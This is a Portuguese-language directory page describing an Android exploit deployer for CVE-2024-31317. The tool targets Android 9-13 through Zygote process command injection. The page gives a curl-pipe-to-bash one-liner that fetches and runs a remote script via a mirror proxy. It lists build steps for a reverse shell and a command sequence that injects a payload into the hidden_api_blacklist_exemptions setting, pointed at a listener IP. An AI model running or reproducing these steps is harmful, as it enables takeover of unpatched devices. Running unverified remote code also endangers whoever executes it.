Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-31317-PoC-Deployer — Ferramenta de implantação automatizada para o exploit PoC CVE-2024-31317 direcionado ao Android 9-13. Gera payloads de shell reverso e configura escalonamento de privilégios via injeção de processo Zygote para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/webldix/cve-2024-31317-poc-deployer
Segurança AndroidEscalada de PrivilégiosExploraçãoShellcodeTestes de PenetraçãoSegurança MóvelDesenvolvimento de PayloadsExploração de Binários

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
webldix/cve-2024-31317-poc-deployer

CVE-2024-31317-PoC-Deployer

Ferramenta de implantação automatizada para o exploit PoC CVE-2024-31317 direcionado ao Android 9-13. Gera payloads de shell reverso e configura escalonamento de privilégios via injeção de processo Zygote para testes de segurança autorizados.

Ver Repositório
528há 1 anoRevisado pelo Kitploit

CVE-2024-31317-PoC-Deployer

Android Version Patch Level License

Uma ferramenta de implantação para o exploit de prova de conceito CVE-2024-31317, voltada para dispositivos Android 9 a 13.

📝 Descrição do Projeto

O CVE-2024-31317-PoC-Deployer é um script de implantação automatizado usado para gerar e configurar rapidamente todos os arquivos necessários para a exploração da vulnerabilidade CVE-2024-31317. Essa vulnerabilidade afeta dispositivos Android 9 a 13, permitindo elevação de privilégios e execução de código arbitrário através do processo Zygote.

🚨 Informações da Vulnerabilidade

  • CVE ID: CVE-2024-31317
  • Escopo: Android 9 ao Android 13
  • Versão corrigida: Versões Android com nível de patch de junho de 2024 ou superior
  • Tipo de vulnerabilidade: Injeção de comandos no processo Zygote
  • Permissão necessária: WRITE_SECURE_SETTINGS

📦 Arquivos Incluídos

  • reverse_shell.c - Programa de shell reverso implementado em C
  • payload.txt - Payload de exploração especialmente construído
  • compile.sh - Script de compilação automática
  • README.txt - Instruções detalhadas de uso
  • CVE-2024-31317.txt - Documento de análise técnica da vulnerabilidade

🛠️ Início Rápido

  1. Executar o script de implantação remota:

    root@kitploit:~
    pkg install -y curl ; bash -c "$(curl -L https://ghfast.top/https://github.com/Webldix/CVE-2024-31317-PoC-Deployer/blob/main/Android_Zygote_Research_Kit.sh)"
    
  2. Compilar o shell reverso:

    root@kitploit:~
    sh compile.sh
    
  3. Executar o listener do shell reverso:

    root@kitploit:~
    sh reverse_shell
    

💣 Passos de Exploração da Vulnerabilidade

  1. Carregue payload.txt para /data/local/tmp/ no dispositivo alvo
  2. Substitua xxx.xxx.xxx no payload.txt pelo IP do seu servidor de escuta
  3. Execute a seguinte sequência de comandos no dispositivo alvo:
    root@kitploit:~
    am force-stop com.android.settings
    cd /data/local/tmp/
    settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
    am start -n com.android.settings/.Settings
    settings put global hidden_api_blacklist_exemptions "null"
    

⚠️ Aviso Legal

Esta ferramenta destina-se apenas a fins legítimos de teste de segurança e pesquisa. A autorização explícita do sistema alvo deve ser obtida antes do uso. O uso não autorizado pode violar a lei. O desenvolvedor não se responsabiliza por qualquer uso indevido.

📜 Licença

Este projeto está licenciado sob a licença MIT - consulte o arquivo LICENSE para mais detalhes.

📚 Referências Técnicas

  • Android Security Bulletin - June 2024
  • CVE-2024-31317 Details
Baixar ferramenta